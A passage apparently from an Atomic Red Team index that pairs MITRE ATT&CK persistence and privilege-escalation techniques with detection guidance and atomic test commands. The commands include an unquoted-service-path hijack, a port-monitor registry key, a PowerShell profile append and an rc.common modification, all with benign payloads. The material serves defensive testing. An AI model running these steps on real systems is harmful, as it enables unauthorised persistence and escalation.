is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) + + This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. + id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:05:23.755Z' + created: '2020-03-13T13:51:58.519Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows + identifier: T1574.009 + atomic_tests: + - name: Execution of program.exe as service with unquoted service path + auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f + description: | + When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability + known as Unquoted Service Path which allows a user to gain SYSTEM privileges. + In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. + supported_platforms: + - windows + input_arguments: + service_executable: + description: Path of the executable used for the service and as the hijacked + program.exe + type: path + default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe + executor: + command: | + copy #{service_executable} "C:\Program Files\windows_service.exe" + copy #{service_executable} "C:\program.exe" + sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto + sc start "Example Service" + cleanup_command: | + sc stop "Example Service" >nul 2>&1 + sc delete "Example Service" >nul 2>&1 + del "C:\Program Files\windows_service.exe" >nul 2>&1 + del "C:\program.exe" >nul 2>&1 + del "C:\Time.log" >nul 2>&1 + name: command_prompt + elevation_required: true + T1547.011: + technique: + created: '2020-01-24T20:02:59.149Z' + modified: '2021-03-30T00:51:59.629Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1547.011 + url: https://attack.mitre.org/techniques/T1547/011 + - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ + description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). + Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. + source_name: Sofacy Komplex Trojan + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html + description: Apple. (2016, September 13). Adding Login Items. Retrieved July + 11, 2017. + source_name: Adding Login Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. + source_name: OSX.Dok Malware + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Plist Modification + description: "Adversaries may modify plist files to run a program during system + boot or user login. Property list (plist) files contain all of the information + that macOS and OS X uses to configure applications and services. These files + are UTF-8 encoded and formatted like XML documents via a series of keys surrounded + by < >. They detail when programs should execute, file paths to the executables, + program arguments, required OS permissions, and many others. plists are located + in certain locations depending on their purpose such as /Library/Preferences + (which execute with elevated privileges) and ~/Library/Preferences + (which execute with a user's privileges). \n\nAdversaries can modify plist + files to execute their code as part of establishing persistence. plists may + also be used to elevate privileges since they may execute in the context of + another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for + execution at login is com.apple.loginitems.plist.(Citation: Methods + of Mac Malware Persistence) Applications under this plist run under the logged + in user's context, and will be started every time the user logs in. Login + items installed using the Service Management Framework are not visible in + the System Preferences and can only be removed by the application that created + them.(Citation: Adding Login Items) Users have direct control over login items + installed using a shared file list which are also visible in System Preferences + (Citation: Adding Login Items). Some of these applications can open visible + dialogs to the user, but they don’t all have to since there is an option to + \"hide\" the window. If an adversary can register their own login item or + modified an existing one, then they can use it to execute their code for a + persistence mechanism each time the user logs in (Citation: Malware Persistence + on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled + can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) + can do this as well. (Citation: Adding Login Items)" + id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed. + + All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) + + Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - macOS + identifier: T1547.011 + atomic_tests: + - name: Plist Modification + auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 + description: 'Modify MacOS plist file in one of two directories + +' + supported_platforms: + - macos + executor: + steps: | + 1. Modify a .plist in + + /Library/Preferences + + OR + + ~/Library/Preferences + + 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) + name: manual + T1556.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.003 + url: https://attack.mitre.org/techniques/T1556/003 + - source_name: Apple PAM + url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt + description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules. + Retrieved June 25, 2020. + - source_name: Man Pam_Unix + url: https://linux.die.net/man/8/pam_unix + description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June + 25, 2020. + - source_name: Red Hat PAM + url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules + description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES + (PAM). Retrieved June 25, 2020. + - source_name: PAM Backdoor + url: https://github.com/zephrax/linux-pam-backdoor + description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June + 25, 2020. + - source_name: PAM Creds + url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/ + description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via + PAM backdoors & DNS requests. Retrieved June 26, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Pluggable Authentication Modules + description: |- + Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM) + + Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor) + + Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM) + id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:12:34.422Z' + created: '2020-06-26T04:01:09.648Z' + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - root + x_mitre_detection: |- + Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files. + + Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + x_mitre_data_sources: + - 'File: File Modification' + - 'Logon Session: Logon Session Creation' + x_mitre_contributors: + - Scott Knight, @sdotknight, VMware Carbon Black + - George Allen, VMware Carbon Black + x_mitre_platforms: + - Linux + - macOS + atomic_tests: [] + T1205.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1205.001 + url: https://attack.mitre.org/techniques/T1205/001 + - url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 + description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible + backdoor. Retrieved October 13, 2018.' + source_name: Hartrell cd00r 2002 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Port Knocking + description: |- + Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. + + This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. + + The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-10-21T01:26:31.804Z' + created: '2020-07-01T18:23:25.002Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Record network packets sent to and from the system, looking + for extraneous packets that do not belong to established flows. + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + x_mitre_platforms: + - Linux + - macOS + - Windows + - Network + atomic_tests: [] + T1547.010: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.010 + url: https://attack.mitre.org/techniques/T1547/010 + - url: http://msdn.microsoft.com/en-us/library/dd183341 + description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12, + 2014. + source_name: AddMonitor + - url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf + description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint + slides]. Retrieved November 12, 2014. + source_name: Bloxham + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Port Monitors + description: "Adversaries may use port monitors to run an attacker supplied + DLL during system boot for persistence or privilege escalation. A port monitor + can be set through the AddMonitor API call to set a DLL to be + loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 + and will be loaded by the print spooler service, spoolsv.exe, on boot. The + spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) + Alternatively, an arbitrary DLL can be loaded if permissions allow writing + a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. + \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* + Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this + technique to load malicious code at startup that will persist on system reboot + and execute as SYSTEM." + id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-01-24T19:46:27.750Z' + created: '2020-01-24T19:46:27.750Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation: + AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are + abnormal. New DLLs written to the System32 directory that do not correlate + with known good software or patching may be suspicious. \n\nMonitor Registry + writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. + Run the Autoruns utility, which checks for this Registry key as a persistence + mechanism (Citation: TechNet Autoruns)" + x_mitre_data_sources: + - 'File: File Creation' + - 'Process: OS API Execution' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_contributors: + - Stefan Kanthak + - Travis Smith, Tripwire + x_mitre_platforms: + - Windows + identifier: T1547.010 + atomic_tests: + - name: Add Port Monitor persistence in Registry + auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 + description: Add key-value pair to a Windows Port Monitor registry. On the subsequent + reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + supported_platforms: + - windows + input_arguments: + monitor_dll: + description: Addition to port monitor registry key. Normally refers to a + DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions + allow writing a fully-qualified pathname for that DLL. + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" + /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ + +' + cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" + +' + name: command_prompt + elevation_required: true + T1546.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.013 + url: https://attack.mitre.org/techniques/T1546/013 + - source_name: Microsoft About Profiles + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6 + description: Microsoft. (2017, November 29). About Profiles. Retrieved June + 14, 2019. + - source_name: ESET Turla PowerShell May 2019 + url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ + description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell + usage. Retrieved June 14, 2019. + - source_name: Wits End and Shady PowerShell Profiles + url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html + description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege + Elevation using the Powershell Profile. Retrieved July 8, 2019.' + - url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf + description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING + CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. + source_name: Malware Archaeology PowerShell Cheat Sheet + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: PowerShell Profile + description: "Adversaries may gain persistence and elevate privileges by executing + malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) + is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) + starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) + supports several profiles depending on the user or host program. For example, + there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) + host programs such as the PowerShell console, PowerShell ISE or Visual Studio + Code. An administrator can also configure a profile that applies to all users + and host programs on the local computer. (Citation: Microsoft About Profiles) + \n\nAdversaries may modify these profiles to include arbitrary commands, functions, + modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) + drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) + session the modified script will be executed unless the -NoProfile + flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) + \n\nAn adversary may also be able to escalate privileges if a script in a + PowerShell profile is loaded and executed by an account with higher privileges, + such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)" + id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T21:31:31.082Z' + created: '2020-01-24T15:11:02.758Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include: + + * $PsHome\Profile.ps1 + * $PsHome\Microsoft.{HostProgram}_profile.ps1 + * $Home\My Documents\PowerShell\Profile.ps1 + * $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 + + Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_contributors: + - Allen DeRyke, ICE + x_mitre_platforms: + - Windows + identifier: T1546.013 + atomic_tests: + - name: Append malicious start-process cmdlet + auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896' + description: 'Appends a start process cmdlet to the current user''s powershell + profile pofile that points to a malicious executable. Upon execution, calc.exe + will be launched. + +' + supported_platforms: + - windows + input_arguments: + exe_path: + description: Path the malicious executable + type: Path + default: calc.exe + ps_profile: + description: Powershell profile to use + type: String + default: "$profile" + dependency_executor_name: powershell + dependencies: + - description: 'Ensure a powershell profile exists for the current user + +' + prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} + +' + get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force + +' + executor: + command: | + Add-Content #{ps_profile} -Value "" + Add-Content #{ps_profile} -Value "Start-Process #{exe_path}" + powershell -Command exit + cleanup_command: | + $oldprofile = cat $profile | Select-Object -skiplast 1 + Set-Content $profile -Value $oldprofile + name: powershell + T1542: + technique: + id: attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e + description: |- + Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting) + + Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses. + name: Pre-OS Boot + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542 + url: https://attack.mitre.org/techniques/T1542 + - source_name: Wikipedia Booting + url: https://en.wikipedia.org/wiki/Booting + description: Wikipedia. (n.d.). Booting. Retrieved November 13, 2019. + - url: https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html + description: Pinola, M. (2014, December 14). 3 tools to check your hard drive's + health and make sure it's not already dying on you. Retrieved October 2, + 2018. + source_name: ITWorld Hard Disk Health Dec 2014 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-10-22T16:35:54.740Z' + created: '2019-11-13T14:44:49.439Z' + x_mitre_platforms: + - Linux + - Windows + - Network + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Firmware: Firmware Modification' + - 'Driver: Driver Metadata' + - 'Process: OS API Execution' + - 'Drive: Drive Modification' + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_defense_bypassed: + - Anti-virus + - Host intrusion prevention systems + - File monitoring + x_mitre_version: '1.1' + x_mitre_detection: |- + Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. + + Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014) + x_mitre_is_subtechnique: false + atomic_tests: [] + T1547.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.012 + url: https://attack.mitre.org/techniques/T1547/012 + - source_name: Microsoft AddPrintProcessor May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor + description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved + October 5, 2020. + - source_name: ESET PipeMon May 2020 + url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ + description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti + Group. Retrieved August 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Print Processors + description: "Adversaries may abuse print processors to run malicious DLLs during + system boot for persistence and/or privilege escalation. Print processors + are DLLs that are loaded by the print spooler service, spoolsv.exe, during + boot. \n\nAdversaries may abuse the print spooler service by adding print + processors that load malicious DLLs at startup. A print processor can be installed + through the AddPrintProcessor API call with an account that has + SeLoadDriverPrivilege enabled. Alternatively, a print processor + can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet + or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: + e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry + key that points to the DLL. For the print processor to be correctly installed, + it must be located in the system print-processor directory that can be found + with the GetPrintProcessorDirectory API call.(Citation: Microsoft + AddPrintProcessor May 2018) After the print processors are installed, the + print spooler service, which starts during boot, must be restarted in order + for them to run.(Citation: ESET PipeMon May 2020) The print spooler service + runs under SYSTEM level permissions, therefore print processors installed + by an adversary may run under elevated privileges." + id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T16:05:36.344Z' + created: '2020-10-05T13:24:49.780Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. + + Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious. + x_mitre_data_sources: + - 'File: File Creation' + - 'Process: OS API Execution' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + x_mitre_contributors: + - Mathieu Tartare, ESET + x_mitre_platforms: + - Windows + atomic_tests: [] + T1037.004: + technique: + id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211 + description: |- + Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. + + Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. + + Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) + + Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) + name: RC Scripts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.004 + url: https://attack.mitre.org/techniques/T1037/004 + - source_name: IranThreats Kittens Dec 2017 + url: https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/ + description: Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, + A Case of Ambiguity and Shared Code. Retrieved May 28, 2020. + - description: Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted + Linux Systems. Retrieved June 24, 2019. + url: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/ + source_name: Intezer HiddenWasp Map 2019 + - source_name: intezer-kaiji-malware + url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ + description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware + turning to Golang. Retrieved December 17, 2020.' + - source_name: Apple Developer Doco Archive Launchd + url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (2016, September 13). Daemons and Services Programming + Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021. + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html + description: Apple. (2016, September 13). Startup Items. Retrieved July 11, + 2017. + source_name: Startup Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - source_name: Ubuntu Manpage systemd rc + url: http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html + description: Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility + generator for starting /etc/rc.local and /usr/sbin/halt.local during + boot and shutdown. Retrieved February 23, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-27T19:58:01.927Z' + created: '2020-01-15T16:25:22.260Z' + x_mitre_platforms: + - macOS + - Linux + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: "Monitor for unexpected changes to RC scripts in the /etc/ + directory. Monitor process execution resulting from RC scripts for unusual + or unknown applications or behavior.\n\nMonitor for /etc/rc.local + file creation. Although types of RC scripts vary for each Unix-like distribution, + several execute /etc/rc.local if present. " + x_mitre_permissions_required: + - root + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1037.004 + atomic_tests: + - name: rc.common + auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de + description: | + Modify rc.common + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) + supported_platforms: + - macos + executor: + command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello + World"'' >> /etc/rc.common + +' + elevation_required: true + name: bash + T1542.004: + technique: + created: '2020-10-20T00:05:48.790Z' + modified: '2020-10-22T02:18:19.568Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc + description: |- + Adversaries may abuse the ROM Monitor (ROMMON) 